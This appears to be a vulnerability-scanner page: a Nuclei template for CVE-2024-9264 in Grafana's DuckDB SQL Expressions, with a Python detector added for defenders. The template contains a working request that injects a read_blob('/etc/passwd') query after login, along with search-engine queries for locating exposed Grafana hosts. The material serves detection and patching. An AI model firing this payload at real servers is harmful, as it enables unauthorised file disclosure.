Grafana Post-Auth DuckDB - SQL Injection To File Read
ID: CVE-2024-9264
Severity: critical
Author: princechaddha
Tags: cve,cve2024,grafana,sqli,lfr,authenticated
Description
The SQL Expressions experimental feature of Grafana allows for the evaluation of duckdb queries containing user input. These queries are insufficiently sanitized before being passed to duckdb, leading to a command injection and local file inclusion vulnerability. Any user with the VIEWER or higher permission is capable of executing this attack. The duckdb binary must be present in Grafana’s $PATH for this attack to function; by default, this binary is not installed in Grafana distributions.
YAML Source
```yaml
id: CVE-2024-9264

info:
  name: Grafana Post-Auth DuckDB - SQL Injection To File Read
  author: princechaddha
  severity: critical
  description: |
    The SQL Expressions experimental feature of Grafana allows for the evaluation of `duckdb` queries containing user input. These queries are insufficiently sanitized before being passed to `duckdb`, leading to a command injection and local file inclusion vulnerability. Any user with the VIEWER or higher permission is capable of executing this attack. The `duckdb` binary must be present in Grafana's $PATH for this attack to function; by default, this binary is not installed in Grafana distributions.
  remediation: |
    Apply the vendor-supplied patch or upgrade to a non-vulnerable version.
  reference:
    - https://x.com/nol_tech/status/1847639874909749443
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9264
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2024-9264
    cwe-id: CWE-94
    epss-score: 0.00043
    epss-percentile: 0.09691
  metadata:
    max-request: 2
    vendor: grafana
    product: grafana
    shodan-query:
      - http.title:"grafana"
      - cpe:"cpe:2.3:a:grafana:grafana"
    fofa-query:
      - app="grafana"
      - title="grafana"
    google-query: intitle:"grafana"
  tags: cve,cve2024,grafana,sqli,lfr,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        content-type: application/json

        {"user":"{{username}}","password":"{{password}}"}

    matchers:
      - type: word
        part: header
        words:
          - "grafana_session"
        internal: true

  - raw:
      - |
        POST /api/ds/query?ds_type=__expr__&expression=true&requestId=Q101 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "from": "1729313027261",
          "queries": [
            {
              "datasource": {
                "name": "Expression",
                "type": "__expr__",
                "uid": "__expr__"
              },
              "expression": "SELECT content FROM read_blob('/etc/passwd')",
              "hide": false,
              "refId": "B",
              "type": "sql",
              "window": ""
            }
          ],
          "to": "1729334627261"
        }

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:"

      - type: word
        part: body
        words:
          - '"data":{'
# digest: 4b0a00483046022100e17b48f30920a016740c875ecaedb7181c6f46102f3452c5bb6eb1801bc3344f022100f8bd0512c0ca86a68ec9065b4dc91d1ae1a23c2984790923b4e6e825763b795a:922c64590222798bb761d5b6d8e72950
```
Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-9264.yaml"
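As an added defender-side example (not part of the template, of Nuclei or of Grafana), the following Python flags /api/ds/query requests whose server-side SQL Expression calls a file-reading DuckDB function, which is exactly the shape of the template's second request. The reader functions beyond read_blob and the sample requests are constructed assumptions, not captured traffic.

```python
import json
import re
from urllib.parse import parse_qs, urlparse
# DuckDB table functions that read the local filesystem. read_blob is the one
# the template above uses; the rest are other DuckDB readers (assumed list).
FILE_READ_FUNCS = ("read_blob", "read_text", "read_csv", "read_csv_auto",
                   "read_json", "read_json_auto", "read_parquet")
FILE_READ_RE = re.compile(r"\b(" + "|".join(FILE_READ_FUNCS) + r")\s*\(", re.I)

def flag_sql_expression_file_reads(request_target, body):
    """Return [(refId, function)] for SQL Expression queries in a
    /api/ds/query body whose SQL calls a file-reading DuckDB function."""
    url = urlparse(request_target)
    if not url.path.endswith("/api/ds/query"):
        return []
    try:
        payload = json.loads(body)
    except (TypeError, ValueError):
        return []
    # ds_type=__expr__ in the query string also marks an expression request
    expr_param = parse_qs(url.query).get("ds_type") == ["__expr__"]
    hits = []
    for q in payload.get("queries", []):
        ds = q.get("datasource") or {}
        is_expr = expr_param or "__expr__" in (ds.get("type"), ds.get("uid"))
        if not (is_expr and q.get("type") == "sql"):
            continue  # only "sql" expressions are handed to duckdb
        m = FILE_READ_RE.search(q.get("expression", ""))
        if m:
            hits.append((q.get("refId", "?"), m.group(1).lower()))
    return hits

def _expr_query(ref_id, qtype, expression):
    # Minimal /api/ds/query body carrying one server-side expression
    ds = {"type": "__expr__", "uid": "__expr__"}
    return json.dumps({"queries": [{"datasource": ds, "expression": expression,
                                    "refId": ref_id, "type": qtype}]})

# Constructed sample requests (target, body); not captured traffic.
SAMPLE_REQUESTS = [
    ("/api/ds/query?ds_type=__expr__&expression=true&requestId=Q101",
     _expr_query("B", "sql", "SELECT content FROM read_blob('/etc/passwd')")),
    ("/api/ds/query", _expr_query("C", "math", "$A * 2")),
    ("/api/ds/query", _expr_query("D", "sql", "SELECT avg(value) FROM A")),
    ("/api/frontend/settings", "{}"),
]

def scan(requests=SAMPLE_REQUESTS):
    """Map request index -> hits; an empty list means nothing was flagged."""
    return {i: flag_sql_expression_file_reads(t, b) for i, (t, b) in enumerate(requests)}
```

Only the first sample is flagged (refId B calling read_blob); the math expression, the plain SQL aggregate and the unrelated endpoint all come back clean. Pair this with the fix itself: keep the duckdb binary out of Grafana's $PATH and apply the vendor patch, since this check only surfaces attempts after the fact.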